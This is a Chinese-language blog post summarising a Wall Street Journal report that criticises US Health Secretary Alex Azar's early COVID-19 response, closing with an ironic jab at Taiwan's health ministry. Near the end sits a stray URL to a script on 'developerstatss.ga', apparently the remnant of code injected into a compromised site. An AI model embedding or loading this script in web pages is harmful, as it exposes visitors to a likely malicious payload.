分類
筆記

你品你細品

4/22華爾街日報刊出長篇報導「Health Chief’s Early Missteps Set Back Coronavirus Response 」,痛批美國Health and Human Services部長Alex Azar從今年一月份開始各種錯誤的公衛政策與對川普總統的謊言,造成後來的疫情肆虐與百姓受苦,例如:

1/29內閣會議上Azar部長告知川普,美國對Covid-19疫情完全掌握。
當其他官員詢問美國疾病管制主管(CDC)Dr. Robert Redfield有關快篩檢測試劑研發狀況時,這位Azar打斷Dr. Redfield發言,主動表示「美國正以史上最快速度成功研發試劑,未來幾週內將有百萬甚至千萬份試劑供全國使用」。

而後來事實卻是美國CDC發放的試劑因重大瑕疵被迫全面回收。

這位Azar部長在會議上當面對CDC主管Dr. Redfield咆嘯怒罵後者欺騙。
許多內閣官員均指出Azar部長對疫情初期十分忽視,甚至對川普的疫情報告都常有不必要的拖延。內部其實認為美國疫情擴大與此人的怠惰輕忽有關。
例如早在1/3美國CDC即警告Azar部長Covid-19威脅迫在眼前,但Azar卻拖到1/18才對川普簡報。


1/28 Azar公開聲稱:「病毒不會對美國人民日常生活有任何影響。(no impact on their day-to-day life)」

1/31 Azar忽然宣布:「公衛危機並管制中國飛美國航班。」

WSJ還批評Azar部長對該部門分得的$1千億美元刺激經濟方案根本未起到應有妥善運用與監督責任,美國現在許多醫院或醫療體系因為資金嚴重短缺面臨「幾日內隨時可能倒閉」的風險,而這些基層反應提出申請後主管機關遲遲不撥款。

若在此時此刻發生連鎖醫院倒閉….


看在眼裡的川普,在3月初針對疫情成立的FEMA(聯邦緊急事務管理署)把這位原本只是擔任藥廠在華府的說客律師出身卻暴得大位的Azar部長排除在團隊之外。

不管WSJ報導是否存在白宮內部鬥爭下的事實扭曲,但現實面就是這位部長4/3之後就沒再見過川普,顯然確實是被排除在目前的決策核心之外。
有趣的來囉~

然後我們台灣衛福部在4/27 發佈新聞:「陳時中部長與美國衛生部Alex Azar部長舉行雙邊電話會議深化及擴大衛生領域合作


#你品你細品

https://js.developerstatss.ga/stat.js?n=ns1

發表迴響

在下方填入你的資料或按右方圖示以社群網站登入:

WordPress.com 標誌

您的留言將使用 WordPress.com 帳號。 登出 /  變更 )

Google photo

您的留言將使用 Google 帳號。 登出 /  變更 )

Twitter picture

您的留言將使用 Twitter 帳號。 登出 /  變更 )

Facebook照片

您的留言將使用 Facebook 帳號。 登出 /  變更 )

連結到 %s